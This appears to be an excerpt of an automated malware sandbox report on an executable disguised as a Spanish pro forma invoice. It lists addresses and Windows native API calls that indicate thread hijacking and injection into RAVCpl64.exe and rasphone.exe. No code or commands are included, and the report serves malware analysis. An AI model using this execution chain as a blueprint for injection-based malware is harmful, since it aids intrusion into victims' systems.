              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772B10 NtAllocateVirtualMemory,2_2_36772B10
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772B00 NtQueryValueKey,2_2_36772B00
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772BE0 NtQueryVirtualMemory,2_2_36772BE0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772B80 NtCreateKey,2_2_36772B80
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367738D0 NtGetContextThread,2_2_367738D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367729F0 NtReadFile,2_2_367729F0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367729D0 NtWaitForSingleObject,2_2_367729D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36443619 NtSetContextThread,2_2_36443619
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36443C5A NtResumeThread,2_2_36443C5A
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36443944 NtSuspendThread,2_2_36443944
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_049168F2 SleepEx,NtCreateSection,3_2_049168F2
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_04916A7D SleepEx,NtResumeThread,3_2_04916A7D
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882CF0 NtDelayExecution,LdrInitializeThunk,4_2_04882CF0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882C30 NtMapViewOfSection,LdrInitializeThunk,4_2_04882C30
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_04882D10
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882E50 NtCreateSection,LdrInitializeThunk,4_2_04882E50
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882F00 NtCreateFile,LdrInitializeThunk,4_2_04882F00
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048829F0 NtReadFile,LdrInitializeThunk,4_2_048829F0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882A80 NtClose,LdrInitializeThunk,4_2_04882A80
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882AC0 NtEnumerateValueKey,LdrInitializeThunk,4_2_04882AC0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882A10 NtWriteFile,LdrInitializeThunk,4_2_04882A10
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882B80 NtCreateKey,LdrInitializeThunk,4_2_04882B80
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04882B90
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_04882BC0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882B00 NtQueryValueKey,LdrInitializeThunk,4_2_04882B00
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882B10 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04882B10
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048834E0 NtCreateMutant,LdrInitializeThunk,4_2_048834E0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04884570 NtSuspendThread,4_2_04884570
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04884260 NtSetContextThread,4_2_04884260
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882CD0 NtEnumerateKey,4_2_04882CD0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882C10 NtOpenProcess,4_2_04882C10
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882C20 NtSetInformationFile,4_2_04882C20
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882C50 NtUnmapViewOfSection,4_2_04882C50
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882DA0 NtReadVirtualMemory,4_2_04882DA0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882DC0 NtAdjustPrivilegesToken,4_2_04882DC0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882D50 NtWriteVirtualMemory,4_2_04882D50
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882E80 NtCreateProcessEx,4_2_04882E80
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882EB0 NtProtectVirtualMemory,4_2_04882EB0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882EC0 NtQuerySection,4_2_04882EC0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882ED0 NtResumeThread,4_2_04882ED0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882E00 NtQueueApcThread,4_2_04882E00
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882FB0 NtSetValueKey,4_2_04882FB0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882F30 NtOpenDirectoryObject,4_2_04882F30
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048829D0 NtWaitForSingleObject,4_2_048829D0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882AA0 NtQueryInformationFile,4_2_04882AA0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882BE0 NtQueryVirtualMemory,4_2_04882BE0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04882B20 NtQueryInformationProcess,4_2_04882B20
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04883C90 NtOpenThread,4_2_04883C90
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04883C30 NtOpenProcessToken,4_2_04883C30
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048838D0 NtGetContextThread,4_2_048838D0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_028E97D1 NtClose,4_2_028E97D1
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_028E976B NtDeleteFile,4_2_028E976B
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04C1F01D NtQueryInformationProcess,NtReadVirtualMemory,4_2_04C1F01D
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04C23628 NtSetContextThread,4_2_04C23628
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04C1F026 NtQueryInformationProcess,4_2_04C1F026
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04C23C68 NtResumeThread,4_2_04C23C68
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04C23F88 NtQueueApcThread,4_2_04C23F88
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04C23948 NtSuspendThread,4_2_04C23948
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_0040351C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeFile created: C:\Windows\resources\0409Jump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_00406C5F0_2_00406C5F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_707E1BFF0_2_707E1BFF
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367646702_2_36764670
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367ED6462_2_367ED646
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DD62C2_2_367DD62C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675C6002_2_3675C600
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FF6F62_2_367FF6F6
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673C6E02_2_3673C6E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B36EC2_2_367B36EC
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FA6C02_2_367FA6C0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367406802_2_36740680
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367427602_2_36742760
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674A7602_2_3674A760
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F67572_2_367F6757
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367404452_2_36740445
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AD4802_2_367AD480
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3680A5262_2_3680A526
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FF5C92_2_367FF5C9
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F75C62_2_367F75C6
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F124C2_2_367F124C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367022452_2_36702245
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672D2EC2_2_3672D2EC
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FF3302_2_367FF330
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674E3102_2_3674E310
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367313802_2_36731380
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EE0762_2_367EE076
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F70F12_2_367F70F1
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674B0D02_2_3674B0D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367300A02_2_367300A0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3677508C2_2_3677508C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3678717A2_2_3678717A
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DD1302_2_367DD130
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672F1132_2_3672F113
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3680010E2_2_3680010E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675B1E02_2_3675B1E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367451C02_2_367451C0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367E0E6D2_2_367E0E6D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36760E502_2_36760E50
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36782E482_2_36782E48
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36732EE82_2_36732EE8
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F9ED22_2_367F9ED2
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36741EB22_2_36741EB2
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F0EAD2_2_367F0EAD
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FFF632_2_367FFF63
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674CF002_2_3674CF00
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36746FE02_2_36746FE0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F1FC62_2_367F1FC6
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FEFBF2_2_367FEFBF
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36743C602_2_36743C60
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F6C692_2_367F6C69
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FEC602_2_367FEC60
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EEC4C2_2_367EEC4C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674AC202_2_3674AC20
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36730C122_2_36730C12
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3680ACEB2_2_3680ACEB
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675FCE02_2_3675FCE0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36758CDF2_2_36758CDF
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367D9C982_2_367D9C98
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740D692_2_36740D69
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F7D4C2_2_367F7D4C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FFD272_2_367FFD27
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673AD002_2_3673AD00
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367DFDF42_2_367DFDF4
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36749DD02_2_36749DD0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36752DB02_2_36752DB0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FEA5B2_2_367FEA5B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FCA132_2_367FCA13
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675FAA02_2_3675FAA0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FFA892_2_367FFA89
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FFB2E2_2_367FFB2E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36740B102_2_36740B10
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3677DB192_2_3677DB19
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B4BC02_2_367B4BC0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367498702_2_36749870
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675B8702_2_3675B870
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B58702_2_367B5870
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FF8722_2_367FF872
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367268682_2_36726868
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367E08352_2_367E0835
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676E8102_2_3676E810
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367438002_2_36743800
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F78F32_2_367F78F3
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F18DA2_2_367F18DA
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367428C02_2_367428C0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B98B22_2_367B98B2
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367568822_2_36756882
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367099E82_2_367099E8
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367859C02_2_367859C0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673E9A02_2_3673E9A0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367FE9A62_2_367FE9A6
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3643E7FC2_2_3643E7FC
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3643E4632_2_3643E463
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_364454042_2_36445404
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3643E3452_2_3643E345
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3643D8C82_2_3643D8C8
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006EA4633_2_006EA463
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006F14043_2_006F1404
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006E98C83_2_006E98C8
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006EA3453_2_006EA345
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006EA7FC3_2_006EA7FC
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_049211E53_2_049211E5
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_04927DED3_2_04927DED
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_04920D2E3_2_04920D2E
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_049202B13_2_049202B1
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_04920E4C3_2_04920E4C
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048504454_2_04850445
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0491A5264_2_0491A526
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048506804_2_04850680
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0490A6C04_2_0490A6C0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0484C6E04_2_0484C6E0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0486C6004_2_0486C600
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048746704_2_04874670
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_049067574_2_04906757
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048527604_2_04852760
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0485A7604_2_0485A760
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048400A04_2_048400A0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048FE0764_2_048FE076
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0491010E4_2_0491010E
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0485E3104_2_0485E310
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04868CDF4_2_04868CDF
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0491ACEB4_2_0491ACEB
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04840C124_2_04840C12
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0485AC204_2_0485AC20
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048CEC204_2_048CEC20
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048FEC4C4_2_048FEC4C
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0490EC604_2_0490EC60
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04906C694_2_04906C69
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04862DB04_2_04862DB0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0484AD004_2_0484AD00
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04850D694_2_04850D69
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04900EAD4_2_04900EAD
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04842EE84_2_04842EE8
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04892E484_2_04892E48
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04870E504_2_04870E50
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048F0E6D4_2_048F0E6D
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0490EFBF4_2_0490EFBF
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04856FE04_2_04856FE0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0485CF004_2_0485CF00
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048668824_2_04866882
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048EC89F4_2_048EC89F
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048528C04_2_048528C0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0487E8104_2_0487E810
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048F08354_2_048F0835
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048368684_2_04836868
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0484E9A04_2_0484E9A0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0490E9A64_2_0490E9A6
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048F2AC04_2_048F2AC0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0490CA134_2_0490CA13
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0490EA5B4_2_0490EA5B
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048C4BC04_2_048C4BC0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04850B104_2_04850B10
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048BD4804_2_048BD480
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048E54904_2_048E5490
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_049075C64_2_049075C6
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0490F5C94_2_0490F5C9
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048C36EC4_2_048C36EC
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0490F6F64_2_0490F6F6
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048ED62C4_2_048ED62C
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048F16234_2_048F1623
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048FD6464_2_048FD646
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0488508C4_2_0488508C
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0485B0D04_2_0485B0D0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_049070F14_2_049070F1
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048551C04_2_048551C0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0486B1E04_2_0486B1E0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0483F1134_2_0483F113
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048ED1304_2_048ED130
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0489717A4_2_0489717A
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0483D2EC4_2_0483D2EC
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0490124C4_2_0490124C
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048413804_2_04841380
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0490F3304_2_0490F330
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048E9C984_2_048E9C98
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048D7CE84_2_048D7CE8
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0486FCE04_2_0486FCE0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04853C604_2_04853C60
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04859DD04_2_04859DD0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048EFDF44_2_048EFDF4
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0490FD274_2_0490FD27
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04907D4C4_2_04907D4C
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04851EB24_2_04851EB2
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04909ED24_2_04909ED2
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048F3FA04_2_048F3FA0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04901FC64_2_04901FC6
